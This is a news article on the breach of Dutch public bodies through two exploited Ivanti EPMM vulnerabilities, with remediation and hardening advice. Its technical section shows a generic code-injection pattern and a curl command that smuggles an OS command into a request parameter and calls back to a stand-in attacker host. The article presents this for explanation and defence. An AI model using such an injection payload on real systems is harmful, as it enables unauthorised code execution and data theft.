The Netherlands' privacy regulator has confirmed it was breached in the recent wave of attacks against Ivanti's edge software. The Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP) was among the victims when threat actors rushed to weaponize two Ivanti Endpoint Manager Mobile (EPMM) flaws as zero-days, exposing employee personal data. One of the bugs, CVE-2026-1281, carries a 9.8 CVSS rating and was added to CISA's Known Exploited Vulnerabilities catalog within hours of disclosure.

What happened

In a letter to parliament, justice secretary Arno Rutte and kingdom-relations secretary Eddie van Marum disclosed that an attack dated January 29 affected staff at both the AP and the Council for the Judiciary (Raad voor de rechtspraak, RVDR). According to the ministers, the intruders may have reached personal data including names, business email addresses, and phone numbers. No figures were provided on how many people were affected, but officials said those involved were contacted directly.

The compromise stems from two vulnerabilities in Ivanti EPMM, tracked as CVE-2026-1281 and CVE-2026-1340. Both were exploited in the wild before fixes were broadly deployed — the hallmark of zero-day activity. Ivanti characterized the early exploitation as touching "a very limited number" of customers, but independent researchers indicated the campaign was likely broader than the vendor's framing suggested.

The Dutch national cyber agency NCSC-NL, together with the office of the government CIO, is now evaluating the wider exposure across public-sector systems.

The vulnerabilities

The headline flaw, CVE-2026-1281, is a code-injection bug in Ivanti Endpoint Manager Mobile that allows an unauthenticated attacker to achieve remote code execution. With a CVSS score of 9.8, it sits at the top of the severity scale: no credentials are required and the impact is full system compromise. On January 29, 2026, CISA added it to the Known Exploited Vulnerabilities catalog and set a remediation deadline for federal agencies, confirming active exploitation (CISA alert).

The second issue, CVE-2026-1340, was disclosed alongside it and also tied to the same intrusion activity, though far less public detail is available about its mechanics.

EPMM (formerly known as MobileIron Core) is a mobile-device-management platform. As the UK's NHS pointed out, these appliances are internet-facing by design so that managed devices can reach them from anywhere — which also makes them an attractive, externally reachable target for attackers.

Why patching may not be enough

Security practitioners have warned that simply applying the fix does not undo a breach that has already occurred. watchTowr CEO Benjamin Harris advised that any organization which had a vulnerable EPMM instance exposed at the time of disclosure should assume it is already compromised: treat the box as breached, tear down the affected infrastructure, and run a full incident-response process rather than relying on the patch alone.

That guidance reflects a recurring pattern with edge-appliance zero-days — by the time a patch lands, attackers may have already planted web shells, harvested credentials, or established persistence that survives an update.

Technical background

The following is a general explanation of this class of vulnerability. It uses generic, illustrative examples and does not describe the specific exploit code, payloads, or indicators of compromise used against Ivanti EPMM in this incident.

Code injection leading to unauthenticated RCE is one of the most dangerous bug classes in network-edge software. It typically arises when a request parameter that should be treated purely as data is instead passed into an interpreter — a shell, an expression-language evaluator (such as OGNL or SpEL on Java stacks), a template engine, or a deserialization routine — without sufficient validation.

In abstract terms, a vulnerable handler might take attacker-controlled input and evaluate it. A conceptual example of the kind of flawed pattern this represents:


// ILLUSTRATIVE ONLY — not Ivanti code
String expr = request.getParameter("format");
// attacker-controlled value is evaluated as an expression
Object result = expressionEngine.eval(expr);

If an attacker can reach such an endpoint without authenticating, they can submit a crafted value that the server executes, for example coercing it to run an operating-system command and confirm execution out-of-band:


# GENERIC illustration of an out-of-band callback probe
curl -s "https://target.example/api/endpoint" \
  --data-urlencode 'param=$(id > /tmp/poc; curl http://attacker.example/$(whoami))'

Because internet-facing MDM gateways like EPMM terminate connections from untrusted networks, a single unauthenticated RCE primitive is enough for an attacker to land on the appliance, pivot inward, and access the personal data the platform manages.

Detection and hardening guidance

For organizations running internet-exposed management appliances, the practical steps mirror Harris's advice and standard edge-device hygiene:

  • Apply the vendor's fixed release immediately and confirm the build version reported by the appliance matches the patched version in the advisory.
  • Treat any instance that was exposed before patching as compromised. Preserve and review appliance logs, look for unexpected processes, new files, and outbound connections, and rotate every credential, API token, and certificate the appliance handled.
  • Restrict exposure: place management interfaces behind a VPN or allow-list where the architecture permits, rather than leaving them open to the entire internet.
  • Cross-reference CISA's KEV catalog and the vendor advisory for the official indicators of compromise and remediation deadlines.

References